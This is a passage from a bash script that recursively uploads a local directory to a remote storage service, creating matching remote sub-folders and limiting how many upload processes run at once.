#echo ${#runningPids[#]}
canStartNewBatch=0
fi
fi
# If the item is a folder, recursive call uploadFolder
if [[ -d "$item" ]]; then
# Create sub-folder (with the name equals local folder name) in the remote folder with id equals to parentId, store the
newFolderId=$( makeRemoteDir $1 $(basename ${item}) )
# Recursive call upload
uploadFolder $newFolderId "$item"
fi
done
}